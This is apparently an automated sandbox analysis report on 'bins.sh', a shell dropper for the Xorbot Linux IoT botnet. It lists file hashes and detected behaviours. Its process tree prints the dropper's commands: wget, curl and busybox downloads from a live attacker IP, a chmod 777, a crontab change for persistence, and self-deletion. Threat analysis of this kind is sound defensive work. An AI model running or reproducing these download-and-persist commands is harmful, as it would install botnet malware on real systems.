Overview

overview

10

Static

static

1

bins.sh

ubuntu-18.04-amd64

10

bins.sh

debian-9-armhf

10

bins.sh

debian-9-mips

10

bins.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    140s
  • max time network
    153s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    20-02-2025 22:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    470cc0216b2f04a8f0da2d4a879c25b9

  • SHA1

    cde638aab873b8c3bf20bef9963686a2e985893a

  • SHA256

    27f0a947bccc3033e141bf1929542179446faba00253b9f830edb2ce0f92bd24

  • SHA512

    38734d0e7701ffe55e58f4ac2e57f365c970a03a315c8ce390c58b2ecd453369795dd1d7b049d96f01f2a025368287ec22795e2643df72798bf7175cf84130bb

  • SSDEEP

    192:RuR1a7TGGBS6+C7Qocnzg54AFdamU+C7QoCnzk4AFdamwR1a7TO:RqGBSHnzg54AFdamdnzk4AFdamk

Score
10/10
xorbotbotnetdefense_evasiondiscoveryexecutionpersistenceprivilege_escalationtrojan

Malware Config

Signatures

  • Detects Xorbot 1 IoCs
    botnettrojan
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

    botnettrojanxorbot
  • Xorbot family
    xorbot
  • Contacts a large (2223) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 1 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    executionpersistenceprivilege_escalation
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
    • Executes dropped EXE
    • Renames itself
    • Reads runtime system information
    PID:1483
    • /bin/rm
      /bin/rm bins.sh
      2⤵
        PID:1484
      • /usr/bin/wget
        wget http://37.44.238.88/bins/ztUToCA2tFwidfWCYYmibc3UfsTJzWtw6h
        2⤵
        • Writes file to tmp directory
        PID:1487
      • /usr/bin/curl
        curl -O http://37.44.238.88/bins/ztUToCA2tFwidfWCYYmibc3UfsTJzWtw6h
        2⤵
        • Writes file to tmp directory
        PID:1496
      • /bin/busybox
        /bin/busybox wget http://37.44.238.88/bins/ztUToCA2tFwidfWCYYmibc3UfsTJzWtw6h
        2⤵
        • Writes file to tmp directory
        PID:1497
      • /bin/chmod
        chmod 777 ztUToCA2tFwidfWCYYmibc3UfsTJzWtw6h
        2⤵
        • File and Directory Permissions Modification
        PID:1498
      • /usr/bin/crontab
        crontab -l
        2⤵
          PID:1502
        • /usr/bin/crontab
          crontab -
          2⤵
          • Creates/modifies Cron job
          PID:1504
        • /bin/rm
          rm ztUToCA2tFwidfWCYYmibc3UfsTJzWtw6h
          2⤵
            PID:1514
          • /usr/bin/wget
            wget http://37.44.238.88/bins/M3lBdkNaVO6pksoPe9DnytjJErYnQBfufT
            2⤵
              PID:1517

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • /tmp/ztUToCA2tFwidfWCYYmibc3UfsTJzWtw6h
            Filesize

            98KB

            MD5

            5141342d0df8699fa32a6b066a0c592e

            SHA1

            8157673225bd5182f16215e2aa823a25ca2d4fbc

            SHA256

            54302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d

            SHA512

            d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801

            Download Submit

          • /var/spool/cron/crontabs/tmp.dQHZ7y
            Filesize

            210B

            MD5

            c48aa67930f19b0236d3ceb0aa6865cd

            SHA1

            4669d6e7cde2fcf3812c28ca3f050b3530b8bae2

            SHA256

            a4888356ef367570debcc37ba0bde01fa72c7ec96eedfc822fe71abb01b2cf2b

            SHA512

            e0a90e81a7f400a5fae8324347cec1f091e4588ad39e7a8839748d7b04ed33042c7eb54224ef60a3ab48e77c2f893fd83bb8c7c63814707b8728a6d6139dabff

            Download Submit